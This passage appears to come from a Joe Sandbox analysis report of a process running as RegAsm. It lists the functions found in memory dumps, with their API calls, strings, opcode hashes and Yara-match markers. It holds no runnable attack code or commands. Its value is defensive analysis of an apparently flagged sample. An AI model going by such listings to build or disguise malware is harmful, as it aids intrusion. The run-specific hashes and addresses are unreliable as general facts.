Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminAcquireContext$wintrust.dll
API String ID: 145871493-3357690181
Opcode ID: a07b671004dabbd9e0c488c2255848dc8069c3fd4662c85263061f35b6c7617e
Instruction ID: 736ea45aa22d1bf67ee89fb203daf62ad17d1a029f006c7a856a528f7ea35eff
Opcode Fuzzy Hash: a07b671004dabbd9e0c488c2255848dc8069c3fd4662c85263061f35b6c7617e
Instruction Fuzzy Hash: 4BE092753062199BDF046F62A808B01BAFCE70F308F10401DEA05C6A01E7BD80449F61

Function 6C30BAB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernelbase.dll,?,6C2B05BC), ref: 6C30BAB8
GetProcAddress.KERNEL32(00000000,VirtualAlloc2), ref: 6C30BAD7
FreeLibrary.KERNEL32(?,6C2B05BC), ref: 6C30BAEC

Strings

VirtualAlloc2, xrefs: 6C30BAD1
kernelbase.dll, xrefs: 6C30BAB3

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: VirtualAlloc2$kernelbase.dll
API String ID: 145871493-1188699709
Opcode ID: 5cbbcf5b8dd147e7b47635145eb585502a552928587e8c7effbc1f9ffcefa5f2
Instruction ID: 12cc3b05d5f1b35ba542bab5bafca26919f41cdf211d8f0f908b3249cff8ad57
Opcode Fuzzy Hash: 5cbbcf5b8dd147e7b47635145eb585502a552928587e8c7effbc1f9ffcefa5f2
Instruction Fuzzy Hash: 88E0B6703013969BEF009F62DA19B26BBFCEB0B218F15001EE90595600EBBD84448F10

Function 6C30C290 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C2B77C5), ref: 6C30C298
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle), ref: 6C30C2B7
FreeLibrary.KERNEL32(?,6C2B77C5), ref: 6C30C2CC

Strings

wintrust.dll, xrefs: 6C30C293
CryptCATAdminCalcHashFromFileHandle, xrefs: 6C30C2B1

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle$wintrust.dll
API String ID: 145871493-1423897460
Opcode ID: 7cb2f47747bd4f37d0e0786afc88abe8ee41ae144b44b9bd25d4e63f9c1ef976
Instruction ID: b6e52356fbda4265ab352e86a137b65d8e75d449d95e26bf20fbfa5a5cc6915f
Opcode Fuzzy Hash: 7cb2f47747bd4f37d0e0786afc88abe8ee41ae144b44b9bd25d4e63f9c1ef976
Instruction Fuzzy Hash: E6E092743412119FDF006B69AA18702BBFCEB0A608F44021DE90589A11E7BE8400CB61

Function 6C30BE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?,?,6C30BE49), ref: 6C30BEC4
RtlCaptureStackBackTrace.NTDLL ref: 6C30BEDE
memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C30BE49), ref: 6C30BF38
RtlReAllocateHeap.NTDLL ref: 6C30BF83
RtlFreeHeap.NTDLL(6C30BE49,00000000), ref: 6C30BFA6

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
String ID:
API String ID: 2764315370-0
Opcode ID: e647ff1d3e69a304060f6db16c92bb61bd9ac0b35f648beba8ee8d917b96e965
Instruction ID: 72df2b38c36f49f918d6cce98851098b3b071b251cc8f7b3a148a159890d545f
Opcode Fuzzy Hash: e647ff1d3e69a304060f6db16c92bb61bd9ac0b35f648beba8ee8d917b96e965
Instruction Fuzzy Hash: FE518172B002058FE714CF69CD80BAAB3A6FF88318F294639D555ABB54D731F9068F91

Function 6C2F8E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C2EB58D,?,?,?,?,?,?,?,6C31D734,?,?,?,6C31D734), ref: 6C2F8E6E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C2EB58D,?,?,?,?,?,?,?,6C31D734,?,?,?,6C31D734), ref: 6C2F8EBF
free.MOZGLUE(?,?,?,?,6C2EB58D,?,?,?,?,?,?,?,6C31D734,?,?,?), ref: 6C2F8F24
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C2EB58D,?,?,?,?,?,?,?,6C31D734,?,?,?,6C31D734), ref: 6C2F8F46
free.MOZGLUE(?,?,?,?,6C2EB58D,?,?,?,?,?,?,?,6C31D734,?,?,?), ref: 6C2F8F7A
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C2EB58D,?,?,?,?,?,?,?,6C31D734,?,?,?), ref: 6C2F8F8F

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 9ce20b610eccb6b74f955d8ce559fc693a06920121a06792328a502d03c417c3
Instruction ID: b533194c90f26b4d0c26f2afbe05a9d6014593482876362af8f909d25d425b87
Opcode Fuzzy Hash: 9ce20b610eccb6b74f955d8ce559fc693a06920121a06792328a502d03c417c3
Instruction Fuzzy Hash: CB51A3B1A0161E8FEB10CF54D84069EF3B6EB46304F55062AE926AB740E731E905CB91

Function 6C2B60E0 Relevance: 7.6, APIs: 6, Instructions: 141COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C2B5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C2B60F4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6C2B5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C2B6180
free.MOZGLUE(?,?,?,?,6C2B5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C2B6211
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C2B5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C2B6229
free.MOZGLUE(?,?,?,?,6C2B5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C2B625E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C2B5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C2B6271

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 500054f5f08a72a5740bd13e0911495719c09fe8c826ce54b00f966d95665a46
Instruction ID: 6d9e0803e73ad2da012ab1052e7571a3fbbe1eb34ef7abb338f2caae82cc581d
Opcode Fuzzy Hash: 500054f5f08a72a5740bd13e0911495719c09fe8c826ce54b00f966d95665a46
Instruction Fuzzy Hash: 52518AB1A0060A8FEB18CF68D8C07AAB7B5AF45388F144539DA1AE7701E731E958CB51

Function 6C2F27E0 Relevance: 7.6, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C2F2620,?,?,?,6C2E60AA,6C2E5FCB,6C2E79A3), ref: 6C2F284D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C2F2620,?,?,?,6C2E60AA,6C2E5FCB,6C2E79A3), ref: 6C2F289A
free.MOZGLUE(?,?,?,6C2F2620,?,?,?,6C2E60AA,6C2E5FCB,6C2E79A3), ref: 6C2F28F1
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C2F2620,?,?,?,6C2E60AA,6C2E5FCB,6C2E79A3), ref: 6C2F2910
free.MOZGLUE(00000001,?,?,6C2F2620,?,?,?,6C2E60AA,6C2E5FCB,6C2E79A3), ref: 6C2F293C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6C2F2620,?,?,?,6C2E60AA,6C2E5FCB,6C2E79A3), ref: 6C2F294E

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 10396835ff7d70784980805481b31b7a3017c7ea21c00e56982a1ca3360dde1f
Instruction ID: 5f35b3b7a631fc0a1244ce2a21e43b393964d99978730f1fabb71ec2e0cd2f5e
Opcode Fuzzy Hash: 10396835ff7d70784980805481b31b7a3017c7ea21c00e56982a1ca3360dde1f
Instruction Fuzzy Hash: 1E41C3F1A4024E8FEB10CF68D88476AB7F9AB46308F244539D966EB740E731E905CB61

Function 6C2ACFE0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 134memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C32E784), ref: 6C2ACFF6
LeaveCriticalSection.KERNEL32(6C32E784), ref: 6C2AD026
VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6C2AD06C
VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6C2AD139

Strings

MOZ_CRASH(), xrefs: 6C2AD187

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionVirtual$AllocEnterFreeLeave
String ID: MOZ_CRASH()
API String ID: 1090480015-2608361144
Opcode ID: c5f3daf65446bf3b326a03baaec775cb0a5b5d977c30fb39269b300689acbf00
Instruction ID: 6605bfd0c65be66f21a949bb62183f01eae5aef159c1871b6e098557d2551a0a
Opcode Fuzzy Hash: c5f3daf65446bf3b326a03baaec775cb0a5b5d977c30fb39269b300689acbf00
Instruction Fuzzy Hash: F841AF71B0131A8FDF048EBD8C927AA76B8EB49715F15013DEE58E7784D7A998018BD0

Function 6C2A4DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON

Download Yara Rule

APIs

?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C2A4E5A
?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C2A4E97
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C2A4EE9
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C2A4F02
?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C2A4F1E

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
String ID:
API String ID: 713647276-0
Opcode ID: 5c6a5b1905810370f7c8eb69b028ad535ba7caedbe3d7fcd78f241685c8bc8e0
Instruction ID: 45a84876b3810b2f823fa90384eb83dcf747368747622c8203ab2e92abff0645
Opcode Fuzzy Hash: 5c6a5b1905810370f7c8eb69b028ad535ba7caedbe3d7fcd78f241685c8bc8e0
Instruction Fuzzy Hash: 0441D27160870A9FC705CFA9C88095BF7E4BF89344F109A2DF96687741DB30E95ACB91

Function 00410D90 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00410DB8
strtok_s.MSVCRT ref: 00410EFD

Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,0133AAB8,?,0042110C,?,00000000), ref: 0041A82B
Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: be08417950a04dbd05d639f5f4cad7f5e1b0e92e34aeea28b3310a8f9a2ecdbc
Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
Opcode Fuzzy Hash: be08417950a04dbd05d639f5f4cad7f5e1b0e92e34aeea28b3310a8f9a2ecdbc
Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95

Function 6C2BC150 Relevance: 7.6, APIs: 5, Instructions: 110stringtimeCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C2BC1BC
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C2BC1DC

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Now@Stamp@mozilla@@TimeV12@_strlen
String ID:
API String ID: 1885715127-0
Opcode ID: 10b90234915fac8d82a84660cba261db1af504511ca038d14c23299e900d04ff
Instruction ID: 49d15e06a0720839b363ba461d5e0946378f6dfeb0949b5aa4227d583ba45226
Opcode Fuzzy Hash: 10b90234915fac8d82a84660cba261db1af504511ca038d14c23299e900d04ff
Instruction Fuzzy Hash: FC41D4B1D187448FD710DF28C58078AB7E4AF96748F41856DEC885B712E331E948CB93

Function 6C30A820 Relevance: 7.6, APIs: 5, Instructions: 106stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C32F770), ref: 6C30A858
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C30A87B

Part of subcall function 6C30A9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6C30A88F,00000000), ref: 6C30A9F1

_ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6C30A8FF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C30A90C
LeaveCriticalSection.KERNEL32(6C32F770), ref: 6C30A97E

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
String ID:
API String ID: 1355178011-0
Opcode ID: 8d6d91462e3058dc18b0882440cf58372437c0dc11c9751dde2b0a561401bacf
Instruction ID: b07c994c00bdbfe4c38e2d58855a7c6d7b0c9bc4b214548ed041389b0eeb5e07
Opcode Fuzzy Hash: 8d6d91462e3058dc18b0882440cf58372437c0dc11c9751dde2b0a561401bacf
Instruction Fuzzy Hash: F5419FB5A006088FDB00DFA8E845ADEB774FF08324F148629E856AB781D7359945CFA2

Function 6C2B1530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(-00000002,?,6C2B152B,?,?,?,?,6C2B1248,?), ref: 6C2B159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,6C2B152B,?,?,?,?,6C2B1248,?), ref: 6C2B15BC
moz_xmalloc.MOZGLUE(-00000001,?,6C2B152B,?,?,?,?,6C2B1248,?), ref: 6C2B15E7
free.MOZGLUE(?,?,?,?,?,?,6C2B152B,?,?,?,?,6C2B1248,?), ref: 6C2B1606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C2B152B,?,?,?,?,6C2B1248,?), ref: 6C2B1637

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: d6252ef179091a0bf2a964b13a1d43679cead58db67194759333c8748f3cfa58
Instruction ID: db9d1aa4c06c1ac25a8b8b52ea3f00784cb20877833802680b857fd5f8ecad61
Opcode Fuzzy Hash: d6252ef179091a0bf2a964b13a1d43679cead58db67194759333c8748f3cfa58
Instruction Fuzzy Hash: CA31EC719001199BC7188E78D95186E77A9FF853B87240B2DEC23EBBD4EB30D9548791

Function 6C2A4310 Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000010,?,6C2A42D2), ref: 6C2A436A

Part of subcall function 6C2BCA10: malloc.MOZGLUE(?), ref: 6C2BCA26

memcpy.VCRUNTIME140(00000023,?,?,?,?,6C2A42D2), ref: 6C2A4387
moz_xmalloc.MOZGLUE(80000023,?,6C2A42D2), ref: 6C2A43B7
free.MOZGLUE(00000000,?,6C2A42D2), ref: 6C2A43EF
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C2A42D2), ref: 6C2A4406

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemallocmemcpy
String ID:
API String ID: 2563754823-0
Opcode ID: 32c97ad0a37116cd7966180d1125974e0904bc6a568c3dec80784e981b63ed10
Instruction ID: 790ffcbdfe43b1add7c083c5452095de5576855e3d433fea3f36c0db8edf1d56
Opcode Fuzzy Hash: 32c97ad0a37116cd7966180d1125974e0904bc6a568c3dec80784e981b63ed10
Instruction Fuzzy Hash: B6313B72A001198FD714DEB99C8096EB7A9EF44364B340F39ED15DBB80EF30E9068792

Function 6C30AD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C31E330,?,6C2CC059), ref: 6C30AD9D

Part of subcall function 6C2BCA10: malloc.MOZGLUE(?), ref: 6C2BCA26

memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C31E330,?,6C2CC059), ref: 6C30ADAC
free.MOZGLUE(?,?,?,?,00000000,?,?,6C31E330,?,6C2CC059), ref: 6C30AE01
GetLastError.KERNEL32(?,00000000,?,?,6C31E330,?,6C2CC059), ref: 6C30AE1D
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C31E330,?,6C2CC059), ref: 6C30AE3D

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ErrorLast$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 3161513745-0
Opcode ID: 1762e667f96bd8a8f5460dd904f470611de44080af774d747926e4c72051f0f0
Instruction ID: 1e41a02891821a602fb920418e1209fee21712468606028d04f95917cf72713c
Opcode Fuzzy Hash: 1762e667f96bd8a8f5460dd904f470611de44080af774d747926e4c72051f0f0
Instruction Fuzzy Hash: 5F3150B2A002159FDB14DF799C45AABB7F8EF49624F15883DE85AD7700E734E804CBA1

Function 6C305EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C31DCA0,?,?,?,6C2DE8B5,00000000), ref: 6C305F1F
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C2DE8B5,00000000), ref: 6C305F4B
?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C2DE8B5,00000000), ref: 6C305F7B
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C2DE8B5,00000000), ref: 6C305F9F
?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C2DE8B5,00000000), ref: 6C305FD6

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
